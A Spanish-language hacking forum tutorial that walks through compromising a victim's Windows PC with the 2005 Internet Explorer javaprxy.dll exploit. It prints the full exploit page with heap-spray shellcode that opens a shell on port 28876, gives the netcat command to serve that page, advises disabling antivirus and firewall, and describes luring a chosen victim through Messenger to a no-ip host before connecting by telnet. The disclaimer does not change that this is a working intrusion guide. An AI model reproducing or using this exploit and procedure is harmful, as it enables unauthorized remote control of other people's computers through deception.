Tutorial:Como conseguir una shell remota haciendo uso del exploit “javaprxy.dll”

Como conseguir una shell remota haciendo uso del exploit “javaprxy.dll”

Por: ArcanuS
(Texto bajo licencia)

http://creativecommons.org/licenses/by-nc-nd/2.5/es/

Al final del documento pongo los links para que te puedas bajar esta guia en .pdf o en .doc

Bueno gente, me he dignado a escribir algo ya que hace bastante que no lo hago para este foro y tengo muchas ganas de ponerme las pilas y aportar un granito de arena para esta comunidad que tanto me ha dado y enseñado. Como prometí, mi próximo texto (o sea este) iba a ir dedicado especialmente a WLion que creo que ha sido uno de los tantos que me han animado a escribir esto y fue el quien me presentó este lindo exploit.
Se trata nada mas y nada menos de “Javaprxy.dll”, un exploit que nos permitirá conseguir una shell en el ordenador victima. Los requisitos para que funcione son que la víctima use Internet Explorer 6. También tendremos que usar un poquitito de ingeniería social. Respecto a este exploit, existen tantas técnicas como te dé tu imaginación. Yo voy a exponer solo una. Las demás te las dejo a ti.
Prepárate para divertirte un rato.

Advertencia: Ni yo ni nadie de este foro nos hacemos responsables del mal uso que le des a este material. Los contenidos explicados aquí son netamente explicativos y cualquier mal uso de los mismos correrá bajo tu responsabilidad. Esta guía es de libre distribución y publicación mientras se mantenga el nombre del autor (ArcanuS) y no se distorsione el contenido.

Lo primero que necesitamos es poseer el exploit. Dejo el código a continuación. Está programado en perl y contiene una shell en ensamblador. También para que os sea mas fácil y sobre todo mas creíble, sería muy bueno que registres una cuenta en no-ip. Como siempre digo, cada vez que estemos trabajando con virus, troyanos o algún exploit, conviene desactivar el antivirus y en algunos casos hasta el firewall.

Código:

<html><body>
<SCRIPT language="javascript">
shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
by the FrSIRT < http://www.frsirt.com >
Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html>

# milw0rm.com [2005-07-05]

Todo esto debes copiarlo, abre el bloc de notas y pégalo ahí. Luego guárdalo como index.txt en el directorio raíz (generalmente c:\ ). Una vez conseguido esto renombra el archivo a index.html. Tendría que quedar algo así:

img 1

Paso siguiente es tomar el netcat y ejecutarlo de la siguiente manera:
nc.exe –l –vv –p 80 < c:\index.html

Paso a detallar:
-l : Modo escucha (listen). Dejará el netcat escuchando un puerto.
-vv: Very verbose mode: Obtiene bastante información sobre la víctima.
-p 80: Port (puerto), es el puerto por el cual el programa debe escuchar peticiones entrantes
< c:\index.html: Este comando hará que cuando la víctima entre, el netcat le “sirva” el exploit y ella lo ejecute automáticamente.

img 2

Si has seguido correctamente los pasos, deberás tener ante ti esta pantallita negra. Fíjate que estamos escuchando el puerto 80, éste corresponde al protocolo http. Para darte un ejemplo, cuando tu accedes a una web, por ejemplo www.elhacker.net estas accediendo con tu navegador al puerto 80 del servidor que contiene la página del hacker.net que será enviada a tu navegador en forma de hipertexto para que este la interprete y te la muestre en pantalla. Uffff, creo que con este ejemplo te has confundido mas aun. Venga que no es tan difícil.
Como te dije hoy, este exploit abre una shell en el ordenador víctima en el que es ejecutado. Esta shell se abre en el puerto 28876. Una vez que la víctima haya ejecutado el exploit, solo bastará con hacer un telnet a su ip en el puerto 28876 y habremos entrado a su ordenador de forma anónima (bueno casi). Digo casi porque si la víctima llegara a hacer un netstat –an podría reconocer tu ip, cosa muy difícil pero siempre hay por allí una mente lista… O a su defecto un HackerBot XDDD!!!!.
Ahora si ha llegado el momento de la acción. Iniciamos sesión con nuestro DUC de no-ip y activamos el host. Hagamos de cuenta que el mío fuere www.arcanito.no-ip.org , ahora nos vamos al Messenger, escogemos a la víctima y luego de charlar un rato le decimos que hay una web muy chula y pavadas de esas y le pasamos nuestro “host falso”: www.arcanito.no-ip.org y simplemente esperamos.
La acción aquí debe ser muy rápida ya que el exploit funciona de esta manera: Cuando la víctima lo ejecuta con su IE, este sufre un cuelgue, es en ese momento cuando debemos hacer el telnet. Si la víctima cierra el navegador antes de que nosotros hagamos el telnet pues simplemente no funcionará y habrá que probar de nuevo.

img 3

En la imagen 3 vemos que la víctima ha caído. Por seguridad he tachado los ips e información personal de la persona que voluntariamente se prestó para esto. De los datos que nos ofrece esa pantalla, deberás sacar su ip. Fíjate que hay una línea que dice: Conect to: [ese sería tu ip] from [ip de la victima], es este segundo el que debes considerar.
Paso siguiente y tratando de ser lo mas rápido y ágil posible realizas el telnet a la ip de tu victima por el puerto 28876. Siempre rezando para que esta no haya cerrado el explorador. Fíjate que detrás de la ventana de símbolo del sistema, he incluido una captura de cómo se vería el navegador en el ordenador víctima. Fíjate en su parte superior nos advierte que no responde, (yo lo he subrayado con azul).

Haciendo Telnet:

img 4

Este paso es simple, solamente escribir lo que ves en la captura, remplazando el ip que yo usé por el de tu víctima.
Si todo ha salido bien, ya deberías estar dentro, disfrutando de una hermosa shell obtenida a fuerza de exploit y gracias a Billy Gaty que siempre nos deja estos agujeritos.

img 5

La imagen 5 muestra la shell obtenida. En este momento estoy dentro de la pc de mi amigo. A partir de este paso te dejo solo. Ten cuidado con lo que haces. Recuerda que esta es solo una técnica aplicable a este exploit. Imagina cuantas cosas mas puedes hacer con estas herramientas, solo deja volar tu imaginación que ella será tu único limite. Mmmm, en este momento se me están ocurriendo varias travesuras XDD.

Aclaraciones:
Si bien el exploit admite funcionar bajo WinXp sp2 yo solo lo he probado en sp1.
Es muy importante que no modifiques absolutamente nada del código fuente a no ser que estés verdaderamente seguro de lo que haces.
Recuerda desactivar el/los antivirus y firewalls
El objetivo principal de esta guía es demostrar que IE aún sigue teniendo fallas y un usuario con un poco de conocimientos puede tomar el control de un ordenador de una manera muy sencilla como la explicada aca. Como usuario de Windows que “Lamentablemente” soy, me gustaría que Microsoft trate de solucionar este tipo de fallas.

Agradecimientos:
Quiero agradecer muy especialmente a aquellos seres de los cuales he aprendido muchísimo, y que además muchos de ellos me aguantan día a día en la sala de irc. WLion, Ap0calipse, Crack_X, Fandango, AcidDarck, Kalisto, Gospel, Rojodos y El-Brujo. Perdón si me olvido de alguien.
Y muchas gracias al foro de elhacker.net que es una fuente constante de conocimiento.
ArcanuS.-

Bajar esta guia completa:
.PDF: http://www.freewebtown.com/ArcanuS/space/Manual para conseguir shell via javaprxy/Consiguiendo shell via javaprxy.pdf
.DOC: http://www.freewebtown.com/ArcanuS/space/Manual para conseguir shell via javaprxy/Consiguiendo shell via javaprxy.doc

http://creativecommons.org/licenses/by-nc-nd/2.5/es/